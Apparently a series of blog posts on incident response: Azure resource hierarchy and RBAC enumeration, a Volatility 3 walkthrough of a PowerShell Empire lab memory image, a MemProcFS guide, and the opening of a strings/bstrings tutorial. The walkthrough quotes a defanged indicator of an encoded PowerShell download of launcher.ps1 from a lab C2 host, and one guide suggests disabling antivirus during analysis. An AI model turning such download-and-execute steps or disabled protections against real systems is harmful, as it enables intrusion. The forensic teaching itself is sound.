For example: Imagine you're investigating a security incident in a multinational corporation. You may find that production environments are more tightly controlled than development, thanks to separate management groups. This organization helps you narrow down where a misconfiguration or security hole might exist.
3. Subscriptions
Subscriptions are like folders within the cloud that help organize resources and manage billing. Each subscription can contain a collection of resources such as virtual machines, storage accounts, and databases. In a forensic investigation, this is where things get interesting, because every subscription can have different access permissions.
Key Point: If you're investigating a security breach, ensure you have access to all relevant subscriptions, because the compromised resource could be hidden within a subscription you're not initially granted access to.
4. Resource Groups
Moving deeper into Azure's structure, resource groups act as containers that hold related resources, such as virtual machines or storage accounts. For example, a company might group all resources related to a specific app in one resource group.
Investigative Tip: Sometimes you'll only get access to a single resource group rather than an entire subscription. In that case, your view of the infrastructure will be narrow, limiting your ability to see the bigger picture. Whenever possible, push for subscription-level access.
5. Resources
Finally, resources are the individual services and assets: virtual machines, networking components, storage accounts, and so on. They are the nuts and bolts of Azure, and they are also the focus of most investigations. For example, if a virtual machine has been compromised, you'll need to scrutinize the VM, its associated storage, and network configurations to understand the breach (a quick enumeration sketch follows below).
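To ground this, a minimal PowerShell sketch for enumerating the resources in a resource group of interest, assuming the Az.Resources module; the group name is a placeholder:

# List everything inside a resource group tied to a compromised application
Get-AzResource -ResourceGroupName "CompromisedAppRG" |
    Select-Object Name, ResourceType, Location |
    Sort-Object ResourceType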
-------------------------------------------------------------------------------------------------------------
Subscriptions: The Power Behind Azure's Flexibility
Once your tenant is up and running, you'll need to define one or more subscriptions. Each subscription is essentially a contract with Microsoft for cloud services, with charges accumulating based on usage. Large companies often set up multiple subscriptions to track different projects, which also helps them monitor costs across various departments or teams.
During an investigation, gaining access to the right subscription is crucial because that's where the resources live. Permissions at this level can make or break your ability to fully explore and analyze cloud infrastructure. It's also worth noting that subscriptions come with limits; for example, the number of virtual CPUs (vCPUs) might be capped. If a breach involves a resource-heavy virtual machine, you may need to request a limit increase from Microsoft.
https://learn.microsoft.com/en-us/microsoft-365/enterprise/subscriptions-licenses-accounts-and-tenants-for-microsoft-cloud-offerings?view=o365-worldwide
-------------------------------------------------------------------------------------------------------------
Azure Resource Manager: The Conductor of the Cloud
Before diving into specifics like virtual networks or storage, it's essential to understand Azure Resource Manager (ARM). Think of ARM as the brain behind all deployments in Azure. It provides a management layer, handling the creation, updating, and deletion of resources. One of ARM's strengths is that it takes input from various interfaces (Azure Portal, PowerShell, CLI, or even REST APIs) and ensures consistency across them. It's especially useful during a forensic investigation because you can use any of these tools to explore resource configurations or query logs.
ARM also supports templates, written in JSON, that allow resources to be deployed consistently. These templates serve as a record of how resources were deployed and configured, offering valuable information during an investigation. For example, if a misconfigured virtual machine was deployed using an ARM template, you could identify that exact misconfiguration and track how it might have contributed to a breach.
https://learn.microsoft.com/en-us/azure/azure-resource-manager/management/overview
-------------------------------------------------------------------------------------------------------------
Why Resource Groups Matter for Incident Response
From an incident response and forensic investigation perspective, understanding resource groups is essential. Often, the resources involved in an attack or breach will be grouped together under a specific resource group, allowing you to track and manage them collectively. For example:
- Ease of Management: If an attacker compromises several virtual machines within a resource group, you can manage, update, or even delete all the compromised resources in one go by targeting the resource group.
- Access Control: Role-based access control (RBAC) can be set at the resource group level. This means that permissions for an entire group of resources can be managed centrally, making it easier to ensure that only authorized users have access.
However, one potential challenge is that during investigations, you might only be granted access to a specific resource group rather than the entire subscription.
While this can be helpful for isolating resources, it limits your view of the full Azure environment. If you're only granted permissions for one resource group, you could miss key elements or additional compromised resources in other parts of the subscription. Always aim to request higher-level permissions for a complete view during an investigation.
-------------------------------------------------------------------------------------------------------------
Azure Resource Providers: The Backend Support
Each resource in Azure is managed by a resource provider, a service responsible for provisioning, managing, and configuring the resources. For example:
- To deploy a virtual machine, Azure uses the Microsoft.Compute resource provider.
- For a storage account, the Microsoft.Storage resource provider is used.
When performing investigations or responding to incidents, you won't directly interact with resource providers most of the time. However, understanding that they operate in the background helps you track what services are involved when examining Azure Resource Manager (ARM) templates or logs.
-------------------------------------------------------------------------------------------------------------
Key Azure Services for Incident Response and Forensics
For forensic investigations and incident response, there are certain Azure products you're likely to interact with the most:
Identity and Access Management:
- Azure Active Directory (AAD)/Entra ID: Controls identity and access management, a key area to investigate when tracking how a threat actor gained access to a compromised account or service.
Networking:
- Virtual Networks (VNet): Help isolate resources and control network traffic.
- Network Security Groups (NSGs): Filter network traffic, which can help track network traffic anomalies during an incident.
Compute:
- Virtual Machines (VMs): Key investigation targets in cases of compromised systems. Both Linux and Windows VMs are supported.
- Azure Functions: Provides compute on demand and could be abused by attackers for running scripts in a serverless environment.
Storage:
- Disk Storage: Persistent storage for VMs. Investigators might need to examine disk snapshots or backups to analyze compromised systems.
- Blob Storage: REST-based object storage for unstructured data, which can be a target for data exfiltration.
- Storage Explorer: A graphical tool for viewing and interacting with Azure storage resources, useful for accessing storage data during investigations.
Analytics:
- Log Analytics: Allows you to collect and search through logs, essential for tracking suspicious activity across resources.
- Azure Sentinel: A cloud-native SIEM (Security Information and Event Management) platform, which aggregates data from across the environment and uses intelligent analytics to identify and respond to potential threats.
https://azure.microsoft.com/en-us/products/
-------------------------------------------------------------------------------------------------------------
Resource Identification in Azure: Understanding Resource IDs
Azure resources are uniquely identified using a Universal Resource Identifier (URI). This format helps trace individual resources and track their relationships within the Azure environment, which is critical during incident response. A typical resource URI follows this structure:
/subscriptions/<subscriptionId>/resourceGroups/<resourceGroupName>/providers/<providerName>/<resourceType>/<resourceName>
- subscriptionId: The globally unique identifier for the subscription.
- resourceGroups: The user-generated name of the resource group.
- providerName: The resource provider responsible for managing that resource (e.g., Microsoft.Compute for VMs).
- resourceType: The type of resource (e.g., virtualMachines).
- resourceName: The specific name of the resource.
For example, in the case of a virtual machine named "MiningVM", the resource ID might include URIs for the VM itself, the operating system (OS) disk, the network interface, and even a public IP address (if assigned). Investigators can use these URIs to track and manage each component of a compromised resource.
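A brief sketch of putting a resource ID to work in PowerShell (the ID itself is a hypothetical example):

# Resolve a full resource ID back to a live resource object
$id = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/MiningRG/providers/Microsoft.Compute/virtualMachines/MiningVM"
Get-AzResource -ResourceId $id | Select-Object Name, ResourceType, ResourceGroupName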
-------------------------------------------------------------------------------------------------------------
Investigating Identity and Access: Role-Based Access Control (RBAC)
Azure's Role-Based Access Control (RBAC) is like a security guard at the gates of every resource. It defines who has access to what and what they can do with it: read, write, or delete. During an investigation, understanding RBAC is critical because you'll need to know who had access to a compromised resource and whether their access was appropriate.
For instance, each resource in Azure has a scope, which could be at the level of a management group, subscription, or resource group. A role assignment defines who (user or service account) can do what (role definition) within that scope. The most common roles are Owner, Contributor, and Reader, but custom roles can be created as well.
Imagine you're looking into an incident where sensitive data was leaked from a storage account. By examining RBAC, you might discover that a developer had unnecessary write access to the account, or that a third-party contractor was given too much control over key resources.
https://learn.microsoft.com/en-us/azure/role-based-access-control/built-in-roles
https://learn.microsoft.com/en-us/azure/role-based-access-control/overview
-------------------------------------------------------------------------------------------------------------
Real-World Example: Tracing an Azure Security Breach
Let's put it all together with a simple example. Suppose a virtual machine (VM) in your Azure environment was hacked. You start your investigation by looking into the subscription where the VM resides. First, you check Azure Resource Manager to view the deployment history of the VM. By examining the ARM template, you see that the VM was configured with an outdated operating system, which may have been the entry point for the attacker. Next, you use RBAC to review who had access to the resource group containing the VM. You discover that a former employee still had Owner access, which allowed them to modify settings and potentially introduce vulnerabilities. Finally, you dive into Log Analytics to trace the attacker's movements through the VM's logs, giving you a clear picture of how the breach occurred.
-------------------------------------------------------------------------------------------------------------
When it comes to managing user access in Microsoft Azure, especially during investigations, things can get complicated quickly. Azure uses Role-Based Access Control (RBAC), which defines who has access to what resources and what they can do with those resources. The challenge comes when a user's permissions are scattered across multiple subscriptions and resource groups. Administrators often need to enumerate role assignments to fully understand a user's level of access.
Here's how that can be achieved using Azure's tools.
Listing User Role Assignments: Azure CLI and PowerShell
The Azure CLI and PowerShell provide the most efficient ways to list user role assignments across different levels of Azure resources.
Using Azure CLI to List Role Assignments
The Azure CLI allows you to enumerate role assignments by issuing a command to list all the roles a user has across resources. The steps are:
1. Select the appropriate subscription: First, make sure you've selected the subscription that holds the resources you're investigating:
az account set --subscription "subscription_name_or_id"
2. List role assignments: Use the az role assignment list command to list all role assignments for a specific user within that subscription. The key parameters here are --all to search recursively and --assignee to specify the user.
az role assignment list --all --assignee "user_email_or_id"
This will list the user's roles at both the subscription and resource group levels. If they have owner-level access to a specific resource group but no broader subscription access, this command will reveal that.
Using PowerShell to List Role Assignments
Similarly, you can achieve the same results using PowerShell with the Get-AzRoleAssignment command.
1. Install and set up Azure PowerShell: If you haven't already, install the Azure PowerShell module:
Install-Module -Name Az -AllowClobber
2. Authenticate and select the subscription: Authenticate with your Azure account and choose the correct subscription.
Connect-AzAccount
Select-AzSubscription -SubscriptionId "subscription_id"
3. List role assignments for the user: Use the following command to list role assignments:
Get-AzRoleAssignment -ObjectId (Get-AzADUser -UserPrincipalName "user_email").Id
This will return all roles assigned to the user, including those at the subscription or resource group level.
Why This Matters for Investigations
In cases where a security incident or breach is being investigated, it's critical to understand who had access to what. For example, a user might not have direct access to a subscription but could hold Owner permissions at a specific resource group or even an individual resource level, which could lead to security loopholes. If the user has elevated permissions, such as Owner or Contributor, on critical resources, this could be an entry point for an attacker to escalate their control over the environment. Listing all role assignments helps pinpoint misconfigurations or excessive access that might have been leveraged during an attack.
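Because a user's assignments can span many subscriptions, it may help to loop over all of them; a minimal sketch, assuming the Az module and an illustrative user principal name:

# Enumerate one user's role assignments across every subscription you can see
$upn = "suspect.user@contoso.com"   # hypothetical account under review
foreach ($sub in Get-AzSubscription) {
    Set-AzContext -SubscriptionId $sub.Id | Out-Null
    Get-AzRoleAssignment -SignInName $upn |
        Select-Object @{n='Subscription';e={$sub.Name}}, RoleDefinitionName, Scope
}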
-------------------------------------------------------------------------------------------------------------
MITRE ATT&CK® and Azure: Understanding Threat Actor Behavior
The MITRE ATT&CK® framework provides an extensive matrix of tactics and techniques that threat actors commonly use when attacking cloud platforms like Azure. For instance, attackers frequently aim to:
- Obtain and verify credentials: Attackers often exploit legacy protocols like IMAP, which lack strong security measures. Enforcing multi-factor authentication (MFA) and disabling legacy protocols are essential to mitigate these risks.
- Exfiltrate data via storage accounts: Attackers might abuse Azure's Blob Storage or use the Microsoft Graph API to access and extract sensitive information.
The MITRE ATT&CK framework has detailed mappings for Office 365, Azure AD, and other Azure services, which makes it easier to correlate specific threat tactics with your security controls. Microsoft has even mapped its built-in Azure security controls against MITRE ATT&CK to create a library of 48 potential defenses. You can explore the Azure security mappings here: MITRE ATT&CK for Cloud, Azure Security Controls Mapped to MITRE.
-------------------------------------------------------------------------------------------------------------
Accessing Azure: CLI, Portal, PowerShell, and Graph API
There are four primary ways to interact with Azure during your investigation or daily operations:
- Azure Portal: The graphical interface for viewing and managing Azure resources.
- Azure CLI: A command-line interface for automating resource management.
- PowerShell: Ideal for Windows users who prefer scripting in PowerShell to manage Azure.
- Microsoft Graph API: A RESTful API that allows programmatic access to Azure services, providing deep integration into apps and custom tools.
The Azure CLI and PowerShell options are especially important for large-scale environments where running commands on the fly is necessary to quickly retrieve information. Cloud Shell, a terminal within the Azure Portal, also provides access to these tools without needing local installations.
https://learn.microsoft.com/en-us/cli/azure/what-is-azure-cli
https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
https://learn.microsoft.com/en-us/azure/cloud-shell/overview
https://learn.microsoft.com/en-us/azure/cloud-shell/get-started/classic?tabs=azurecli
Investigating Cloud Shell: Bash vs PowerShell Artifacts
An interesting point to consider during an investigation is whether the attacker used Cloud Shell for their activities. When a user initiates a Cloud Shell session, a storage account is automatically created to store the environment. If Bash was used, traditional Linux forensics can be applied, such as analyzing the .bash_history file to see the commands issued by the user. However, there's a limitation: PowerShell Cloud Shell leaves fewer artifacts. While the underlying actions will still be logged (e.g., through Azure Audit Logs), direct forensics from PowerShell Cloud Shell is limited.
https://learn.microsoft.com/en-us/azure/cloud-shell/get-started/classic?tabs=azurecli
Conclusion
Effectively managing and investigating user access in Azure requires understanding the nuances of role assignments across different subscriptions and resources. Tools like the Azure CLI and PowerShell make it easier to enumerate these roles, while frameworks like MITRE ATT&CK® provide insight into threat actor behavior in cloud environments. The right combination of access control, security controls, and investigative tools can significantly enhance your incident response capabilities in Azure.
Akash Patel

  • "Step-by-Step Guide to Uncovering Threats with Volatility: A Beginner’s Memory Forensics Walkthrough"

Alright, let's dive into a straightforward guide to memory analysis using Volatility. Memory forensics is a vast field, but I'll take you through an overview of some core techniques to get valuable insights. Let's go.
Note: This is not a complete analysis; it's an overview of key steps. In memory forensics, findings can be hit or miss; sometimes we uncover valuable data, sometimes we don't, so it's essential to work carefully.
Step 1: Basic System Information with windows.info
Let's start by getting a basic overview of the memory image using the windows.info plugin. This gives us essential details like the operating system version and kernel debugging info, and helps us ensure the plugins we'll use are compatible.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.info
Step 2: Listing Active Processes with windows.pslist
Now, I'll list all active processes using windows.pslist and save the output. This helps identify running processes, their parent-child relationships, and gives a general look at what's happening in memory.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.pslist > ./testing/pslist.txt
I'm storing the output so we can refer back to it easily. With pslist, we can identify processes and their parent-child links, which can help detect suspicious activity if any processes don't align with expected behavior. (I used the SANS reference material to confirm that processes aligned with their expected parents.)
Step 3: Finding Hidden Processes with windows.psscan
Next, we move to windows.psscan, which scans for processes, including hidden ones that pslist might miss. This is especially useful for finding malware or processes that don't show up in regular listings.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.psscan > ./testing/psscan.txt
After running psscan, I'll sort and compare the results with pslist to see if anything stands out. A quick diff can reveal processes that may be hiding:
sort ./testing/psscan.txt > ./testing/a.txt
sort ./testing/pslist.txt > ./testing/b.txt
diff ./testing/a.txt ./testing/b.txt
In my analysis, I found some suspicious processes like whoami.exe and duplicate mscorsvw.exe entries, which I'll dig into further to verify their legitimacy. (Later analysis showed mscorsvw.exe is legitimate.)
Step 4: Examining Process Trees with windows.pstree
To get a clearer view of how processes are linked, I'll use windows.pstree. This shows the process hierarchy, making it easier to spot unusual or suspicious chains, like a random process launching powershell.exe under a legitimate parent.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.pstree > ./testing/pstree.txt
During my analysis, I noticed a powershell.exe instance that used encoded commands to connect to a suspicious URL (http[:]//192.168.200.128[:]3000/launcher.ps1). This could be an indicator of compromise, possibly a malicious script being downloaded and executed.
Step 5: Checking Command-Line Arguments with windows.cmdline
Now, I'll use the windows.cmdline plugin to check command-line arguments for processes. This is helpful because attackers often use command-line parameters to hide activity.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.cmdline > ./testing/cmdline.txt
Here, I'm filtering out standard system paths (System32) to make it easier to focus on anything that might look unusual. If there's any suspicious execution path, this command can help spot it quickly. (Verify each hit; an unusual path doesn't automatically mean the attacker ran the process from the command line.)
cat ./testing/cmdline.txt | grep -i -v 'system32'
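Since every collection step above repeats the same pattern, you can script the whole gathering phase and grep the saved outputs afterwards. A minimal bash sketch, reusing the same image path and output folder as above (the plugin list is just an example):

# Run each triage plugin once and save its output for later diffing/grepping
IMG=/mnt/d/practice_powershell_empire/practice_powershell_empire.vmem
mkdir -p ./testing
for plugin in windows.pslist windows.psscan windows.pstree windows.cmdline; do
    python3 vol.py -f "$IMG" "$plugin" > "./testing/${plugin#windows.}.txt"
done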
Step 6: Reviewing Security Identifiers with windows.getsids
To understand the permissions and user context of the processes we've flagged as suspicious, I'll check their Security Identifiers (SIDs) using windows.getsids. This tells us who ran a specific process, helping narrow down potential attacker accounts.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.getsids > ./testing/getsids.txt
I'm searching for the user that initiated each suspicious process to see if it's linked to an unauthorized or unusual account. (For example, we identified powershell.exe and cmd.exe execution earlier, so I searched the text file for them:)
cat ./testing/getsids.txt | grep -i cmd.exe
Step 7: Checking Network Connections with windows.netscan
Next, I'll scan for open network connections with windows.netscan to see if any suspicious processes are making unauthorized connections. This is crucial for detecting malware reaching out to a command-and-control (C2) server.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.netscan > ./testing/netscan.txt
In this case, I found some closed connections to a suspicious IP (192.168.200.128:8443), initiated by powershell.exe. This further confirms the likelihood of malicious activity.
Step 8: Module Analysis with windows.ldrmodules
To see if there are unusual DLLs or modules loaded into suspicious processes, I'll use windows.ldrmodules. This can help catch injected modules or rogue DLLs.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.ldrmodules > ./testing/ldrmodule.txt
cat ./testing/ldrmodule.txt | egrep -i 'cmd|powershell'
In very simple language: if you see even a single False, you have to analyze that entry manually to decide whether it's legitimate. (You will get a lot of false positives; this is where the DFIR examiner's judgment comes in.)
Step 9: Detecting Malicious Code with windows.malfind
Finally, I'll scan for potentially malicious code within processes using windows.malfind. It detects suspicious memory sections marked PAGE_EXECUTE_READWRITE, which attackers often use.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.malfind > ./testing/malfind.txt
cat ./testing/malfind.txt | grep -i 'PAGE_EXECUTE_READWRITE'
Next, I looked at the PIDs for the powershell/cmd hits so I could dump those regions and run an antivirus scan, strings, or bstrings against them. I noted the PowerShell-related malfind PIDs (5908, 6164, 8308, 1876 in this capture) and dumped them one by one:
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.malfind --dump --pid 5908
Once done, you can run strings or bstrings against the dumps, scan them with antivirus, or hand them to a reverse engineer; that's up to you. (There are more commands available and you can dig deeper; this is only an overview. You can find more commands in my previous article:)
https://www.cyberengage.org/post/unveiling-volatility-3-a-guide-to-extracting-digital-artifacts
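Rather than dumping each PID by hand, a short loop handles all four at once. A minimal sketch using the PIDs identified above (-o sets the output directory for the dumped sections):

# Dump the flagged malfind regions for every suspicious PID in one pass
IMG=/mnt/d/practice_powershell_empire/practice_powershell_empire.vmem
mkdir -p ./testing/dumps
for pid in 5908 6164 8308 1876; do
    python3 vol.py -f "$IMG" -o ./testing/dumps windows.malfind --dump --pid "$pid"
done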
--------------------------------------------------------------------------------------------------------
Digging into Registry Hives
Step 1
Moving on to the registry, I'll first check which hives are available using windows.registry.hivelist. Important hives like NTUSER.DAT can hold valuable info, including recently accessed files.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.hivelist
In this capture, the two most important hives, usrclass.dat and ntuser.dat, are present. First, get their offsets: usrclass.dat at 0x9f0c25e75000 and ntuser.dat at 0x9f0c25be8000 in our case. Then check which data is available under each hive:
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25be8000
As the output shows, only some of the data is intact. From here you can do one of two things: dump the hives and analyze them with a tool like Registry Explorer, just as in normal Windows registry analysis, or dump all the output to a text file and analyze it there. Your choice; let's go with the text file:
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25be8000 --recurse > ./testing/ntuser.txt
Step 2: Checking User Activity with the UserAssist Plugin
The userassist plugin helps verify whether specific applications or files were executed by the user, like PowerShell commands. Results may vary, and in this case it might not yield any findings. If it doesn't work out, fall back to the ntuser.dat method above: dump all the UserAssist data to a text file with --recurse and analyze it manually (just change the offset). For example:
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25e75000 --recurse > ./testing/usrclss.txt
Step 3: Scanning for Key Files with Filescan
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.filescan > ./testing/filescan.txt
This step isn't strictly necessary (you can simply use the first two steps to extract and dump hives for analysis with Registry Explorer or manual examination), but here's why it's useful. Suppose you ran filescan, saved the output, and want to locate hives such as SAM or SECURITY:
cat ./testing/filescan.txt | grep -i 'usrclass.dat' | grep 'analyst'
This greps for usrclass.dat and then for the user analyst, because the PowerShell executed under the analyst user account. After going through the output, I identified multiple hives that might be useful, noted their offsets, and planned to dump them all for analysis in Registry Explorer.
Step 4: Dumping Specific Files (Like ntuser.dat, usrclass.dat)
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.dumpfiles --virtaddr
(Supply the virtual address you noted from filescan.) Use this for any additional files or executables of interest. If data is retrieved, analyze it with tools like RegRipper.
Step 5
Similarly, you can search filescan.txt for the keyword "history". If you find browser history files or PSReadLine history, dump them out and analyze them; for browser history, NirSoft's browsing history viewer works well. A loop version of this dumping step follows below.
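If you noted several virtual addresses from filescan, a loop saves retyping. A minimal sketch; the two addresses are placeholders for the ones you actually noted:

# Dump each file of interest by its filescan virtual address
IMG=/mnt/d/practice_powershell_empire/practice_powershell_empire.vmem
mkdir -p ./testing/files
for addr in 0xADDR1 0xADDR2; do   # replace with your noted offsets
    python3 vol.py -f "$IMG" -o ./testing/files windows.dumpfiles --virtaddr "$addr"
done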
Step 6: Log Analysis
You can also search for event logs; in our case:
cat ./testing/filescan.txt | grep -i '.evtx'
You can dump the logs and use EvtxECmd to parse and analyze them.
-------------------------------------------------------------------------------------------------------------
Once done with Volatility, here's what I always do: run strings or bstrings.exe against the memory image using the IOCs I've identified, to look for extra hits in case I missed something. For example, we found launcher.ps1 among the IOCs, so I ran strings against the memory image:
strings /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem | grep -i 'launcher.ps1'
I also searched for the IP we identified as an IOC. This is my habit after running Volatility; you don't have to do it, but it's worth considering. How to run strings/bstrings.exe is covered in the article linked below:
https://www.cyberengage.org/post/memory-forensics-using-strings-and-bstrings-a-comprehensive-guide
-------------------------------------------------------------------------------------------------------------
Next, I ran MemProcFS Analyzer. Dirty Logs in MemProcFS: examining logs such as those found in MPLogs\Dirty\ reveals possible threats, like PowerShell Grampus or Mimikatz. There are legitimate files here as well; you have to determine what is legitimate and what isn't. How to run MemProcFS is covered in the article linked below:
https://www.cyberengage.org/post/memprocfs-memprocfs-analyzer-comprehensive-analysis-guide
-------------------------------------------------------------------------------------------------------------
Conclusion
Alright, so we've walked through a high-level approach to memory forensics. Each tool and plugin we used, like Volatility and MemProcFS, gave us a way to dig into different artifacts, whether registry entries, logs, or user files. Some methods hit, some miss; memory analysis can be like that, but the key is to stay thorough.
Remember, you may or may not find everything you're looking for. But whatever you do uncover, like IOCs or specific user actions, adds to your investigation. Just keep at it, keep testing, and let each artifact guide your next step. This is all part of the process; memory forensics is about making the most out of what you have, one artifact at a time.
Akash Patel

  • MemProcFS/MemProcFS Analyzer: Comprehensive Analysis Guide

MemProcFS is a powerful memory forensics tool that allows forensic investigators to mount raw memory images as a virtual file system. This enables direct analysis of memory artifacts without heavy processing tools: the memory dump becomes a filesystem with readable structures for processes, drivers, services, and more. This guide covers best practices for using MemProcFS, from mounting a memory image to performing in-depth analysis with various tools and techniques.
--------------------------------------------------------------------------------------------------------
Mounting the Image with MemProcFS
The basic command to mount a memory dump using MemProcFS is:
MemProcFS.exe -device c:\temp\memdump-win10x64.raw
This mounts the memory dump as a virtual file system. However, the best way to use MemProcFS is to take advantage of its built-in Yara rules provided by Elastic. These rules let you scan for Indicators of Compromise (IOCs) such as malware signatures, suspicious files, and behaviors within the memory image.
Command with Elastic Yara Rules
To mount a memory image with Elastic's Yara rules enabled, use:
MemProcFS.exe -device c:\temp\memdump-win10x64.raw -forensic 1 -license-accept-elastic-license-2.0
The -forensic 1 flag mounts the image with forensic options enabled, while the -license-accept-elastic-license-2.0 flag accepts Elastic's license terms for the built-in Yara rules.
--------------------------------------------------------------------------------------------------------
Methods for Analysis
There are multiple ways to analyze the mounted memory image. The three most common are:
Using WSL (Windows Subsystem for Linux)
Using Windows Explorer
Using the MemProcFS Analyzer Suite
1. Analyzing with WSL (Windows Subsystem for Linux)
One of the most efficient ways to analyze the memory dump is through the Linux shell within Windows, i.e., WSL. This lets you use Linux tools such as grep, awk, and strings to filter and search the mounted image.
Step 1: Create a Directory in WSL
First, create a directory in WSL where you will mount the memory image:
sudo mkdir /mnt/d
Step 2: Mount the Windows Memory Image to WSL
Next, mount the image into the directory you just created. Assuming MemProcFS has mounted the image on the M: drive in Windows, attach it to WSL with:
sudo mount -t drvfs M: /mnt/d
This mounts the M: drive (where MemProcFS has mounted the memory image) to /mnt/d in WSL. You can now access the mounted memory dump from WSL for further analysis with grep, awk, strings, and other Linux utilities.
--------------------------------------------------------------------------------------------------------
2. Analyzing with Windows Explorer
MemProcFS makes it easy to browse the memory image in Windows Explorer by exposing critical memory artifacts in a readable format. Here's what each folder contains:
Key Folders and Files
Sys Folder:
Proc: Proc.txt lists processes running in memory; Proc-v.txt shows detailed command-line information for the processes.
Drivers: Drivers.txt contains information about drivers loaded in memory.
Net: Netstat.txt lists network information at the time of acquisition; Netstat-v.txt provides details about the network paths used by processes.
Services: Services.txt lists installed services; the /byname subfolder provides detailed information for each service.
Tasks: Task.txt contains information about scheduled tasks in memory.
Name Folder: Contains a folder for each process with detailed information such as files, handles, modules, and Virtual Address Descriptors (VADs).
PID Folder: Similar to the Name Folder, but keyed by Process ID (PID) instead of process name.
Registry Folder: Contains all registry keys and values available in memory at the time of the dump.
Forensic Folder: CSV files (e.g., pslist.csv) that are easily analyzable with Eric Zimmerman's tools.
Timeline: Timestamped events related to memory activity, available in both .csv and .txt formats.
Files Folder: Attempts to reconstruct the system's C: drive from memory.
NTFS Folder: Attempts to reconstruct the NTFS file system structure from memory.
Yara Folder: Results from Yara scans, populated if Yara scanning is enabled.
FindEvil Folder: Flags suspicious items; you must determine whether each file is malicious or legitimate.
--------------------------------------------------------------------------------------------------------
3. Using the MemProcFS Analyzer Suite
For more automated analysis, MemProcFS comes with an Analyzer Suite that simplifies the process by running pre-configured scripts to extract and analyze data from the memory image.
Step 1: Download and Install the Analyzer Suite
First, download the MemProcFS Analyzer Suite. Inside the suite folder you will find a script named updater.ps1. Run this script in PowerShell to download all the binaries and tools needed for analysis.
Step 2: Run the Analyzer
Once setup is complete, begin the automated analysis by running the MemProcFS-Analyzer.ps1 script:
.\MemProcFS-Analyzer.ps1
This launches the GUI for MemProcFS Analyzer. Select the mounted memory image and (optionally) the pagefile if it is available. When you run the analysis, MemProcFS automatically extracts and analyzes the data.
--------------------------------------------------------------------------------------------------------
Output and Results
After running the MemProcFS analysis, the results are saved in a folder under the script directory. Make sure you have 7-Zip installed, as some of the output may be archived. The default password for the archives is MemProcFS.
Key Output Files:
Parsed Files: All the data successfully parsed by MemProcFS.
Unparsed Files: Data that could not be parsed by the tool.
For further analysis, you can manually review these files using tools like Volatility 3 or WSL utilities. Reviewing both parsed and unparsed files ensures that no critical information is missed.
--------------------------------------------------------------------------------------------------------
Considerations and Best Practices
Antivirus Interference
If antivirus software is running on your analysis machine, it may block certain forensic tools. To avoid interruptions, create exclusions for the tools used by MemProcFS Analyzer or, if necessary, temporarily disable the antivirus during the analysis.
Manual Review of Unparsed Data
While MemProcFS automates many aspects of memory forensics, it is crucial to manually check files that were not parsed during the automated run. These can be analyzed with other memory forensic tools like Volatility 3, or inspected manually with WSL commands, as sketched below.
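As a quick example of that manual review from WSL, you can grep the text files exposed under the mount directly. A minimal sketch, assuming the image is mounted at /mnt/d as in the WSL steps above (path casing may vary with your mount):

# Triage the process listings on a MemProcFS mount
grep -i 'powershell' /mnt/d/sys/proc/proc-v.txt        # full command lines per process
grep -iE 'certutil|regsvr32' /mnt/d/sys/proc/proc.txt  # LOLBAS-style binaries in the process list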
-------------------------------------------------------------------------------------------------------- Conclusion MemProcFS  offers a powerful and efficient way to analyze memory dumps by mounting them as a virtual file system. This method allows for both manual and automated analysis using familiar tools like grep, awk, strings, and the MemProcFS Analyzer Suite . Whether you are performing quick IOC triage or a detailed forensic analysis, MemProcFS can handle a wide range of memory artifacts, from processes and drivers to network activity and registry keys. Key Takeaways : MemProcFS is versatile, offering both manual and automated analysis methods. Use Elastic’s built-in Yara rules to enhance your malware detection capabilities. Leverage WSL or Windows Explorer to manually browse and analyze memory artifacts. The Analyzer Suite automates much of the forensic process, saving time and effort. Always review unparsed files to ensure nothing critical is missed. Akash Patel

  • Memory Forensics Using Strings and Bstrings: A Comprehensive Guide

Memory forensics involves extracting and analyzing data from a computer's volatile memory (RAM) to identify potential Indicators of Compromise (IOCs) or forensic artifacts crucial for incident response. This type of analysis can uncover malicious activity, such as hidden malware, sensitive data, and encryption keys, even after a machine has been powered off.
Two key tools frequently used in this process are Strings and Bstrings. While both extract readable characters from memory dumps, they offer distinct features that suit different environments. In this article, we'll cover the functionality of both tools, provide practical examples, and explore how they can help quickly identify IOCs during memory forensics.
Tools Overview
1. Strings
Functionality: Extracts printable characters from files or memory dumps.
Usage: Primarily used in Linux/Unix environments, although it can be used on other systems via compatible setups (for example, Windows WSL).
Key Features: Lightweight and easy to use; can be combined with search filters like grep to narrow down relevant results.
2. Bstrings (by Eric Zimmerman)
Functionality: Similar to Strings, but designed specifically for Windows environments, with additional features such as regex support and advanced filtering.
Key Features: Regex support for powerful search capabilities; Windows-native, making it ideal for handling Windows memory dumps; capable of offset-based searches.
Basic Usage
1. Using Strings in Linux/Unix Environments
The strings tool extracts printable (readable) characters from binary files, such as memory dumps. Its core functionality is simple but powerful when combined with additional filters such as grep:
strings <file> | grep -i <pattern>
Example: Extracting IP Addresses
If you are hunting for a specific IOC, such as an IP address in a memory dump, extract the printable characters and pipe the results through grep to filter the output.
Example for an IP address:
strings mem.dump | grep -i 192\.168\.0\.
